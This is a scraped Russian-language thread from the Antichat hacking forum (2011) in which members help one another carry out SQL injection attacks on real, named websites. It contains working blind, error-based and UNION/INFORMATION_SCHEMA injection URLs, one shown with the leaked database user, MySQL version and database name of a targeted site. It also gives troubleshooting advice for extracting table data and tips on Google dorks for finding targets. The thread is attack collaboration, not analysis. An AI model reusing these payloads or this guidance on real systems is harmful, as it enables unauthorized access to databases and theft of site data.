ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.08.2011, 18:55
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от foozzi
foozzi said:
как отфильтровать запрос таким образом, мне например надо inurl:index.php?test= но что бы искало по контенту например powered by coolsite
попробовал такую чушь inurl:index.php?test= intext
owered by coolsite
не канает
подскажите
Примерно так:
Код:
Code:
"Powered by: vBulletin" inurl:forum42.html
Советую изучить все поиск. запросы гугла и искать так как тебе надо, а не как он выдаёт.
|
|
|
03.08.2011, 23:15
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
выдаеться ошибка скули, добился через blind
но не могу немного в ней разобраться, вот она:
Код:
Code:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.
звездочками закрыл ip |
|
|
|
03.08.2011, 23:41
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от foozzi
foozzi said:
выдаеться ошибка скули, добился через blind
но не могу немного в ней разобраться, вот она:
Код:
Code:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.
звездочками закрыл ip ошибка тебе выдается потому что нет таблици user, покажи сам запрос который делаешь
|
|
|
|
03.08.2011, 23:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от foozzi
foozzi said:
выдаеться ошибка скули, добился через blind
но не могу немного в ней разобраться, вот она:
Код:
Code:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.
звездочками закрыл ip у тя там инсерт происходит, ты не можешь выводить. Это как общее, а у юзера закрыты права на селект.
|
|
|
|
04.08.2011, 00:07
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
Сообщение от Melfis
Melfis said:
у тя там инсерт происходит, ты не можешь выводить. Это как общее, а у юзера закрыты права на селект.
вот открывает страницу, по идее все норм
Код:
Code:
http://www.seesciencepolicy.org/sitegenius/topic.php?id=361 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1
|
|
|
|
04.08.2011, 00:44
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
вот тебе вывод через ошибку:
Сообщение от None
http://www.seesciencepolicy.org/sitegenius/topic.php?id=361+OR+(SELECT+COUNT(*)+FROM+(SELECT+ 1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT( MID((select+concat_ws(0x3a,user(),version(),databa se())),1,63),+FLOOR(RAND(0)*2)))
seesci_org@s3951@s109.loopia.se:5.0.87-log:seesciencepolicy_org |
|
|
|
05.08.2011, 13:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
2205
Репутация:
0
|
|
Направьте на путь истинный пожалуйста)
На запрос:
Код:
Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--
нормально выдает имена всех таблиц.
На запрос:
Код:
Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=CHAR(таблица)--
корректно отдает имена столбцов.
А на запрос:
Код:
Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(столбец),4,5,6+from+таблица--
шлет лесом вот такой фразой:
Код:
Code:
MySQL error:
1146 : Table 'база.таблица' doesn't exist
Как так не существует?? Ведь я же по второму запросу корректно получил столбцы из этой таблицы... И такая история по всем таблицам. Колонки получаю, а тяну данные, пишет, что таблицы нет.
Как такое возможно? |
|
|
|
05.08.2011, 13:41
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от DronS
DronS said:
Направьте на путь истинный пожалуйста)
На запрос:
Код:
Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--
нормально выдает имена всех таблиц.
На запрос:
Код:
Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=CHAR(таблица)--
корректно отдает имена столбцов.
А на запрос:
Код:
Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(столбец),4,5,6+from+таблица--
шлет лесом вот такой фразой:
Код:
Code:
MySQL error:
1146 : Table 'база.таблица' doesn't exist
Как так не существует?? Ведь я же по второму запросу корректно получил столбцы из этой таблицы... И такая история по всем таблицам. Колонки получаю, а тяну данные, пишет, что таблицы нет.
Как такое возможно? Возможно нет доступа, нет таблицы, наложен чудодейственный фильтр или INFORMATION_SCHEMA вообще муляж.Попробуй обратиться к другим таблицам из INFORMATION_SCHEMA, и к таблицам к текущей базе данных.
|
|
|
|
05.08.2011, 13:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от DronS
DronS said:
Направьте на путь истинный пожалуйста)
вообще-то правильней сделать так:
Код:
Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( table_schema,0x3a,table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--
дальше получаешь колонки, и обращаешься:
Код:
Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( столбец),4,5,6+from+база.таблица--
Всё дело в том, что ты пытаешься обратится к таблице которая скорее всего находится в другой базе, т.к. обращаться нужно напрямую "база.таблица"
|
|
|
|
05.08.2011, 16:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
33429
Репутация:
0
|
|
Сообщение от None
http://www.infinitestatue.com/product_info.php?products_id='60
I see it have error but when i type:
Сообщение от None
http://www.infinitestatue.com/product_info.php?products_id=60' (nothing)
can anybody help me, pls! thank
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
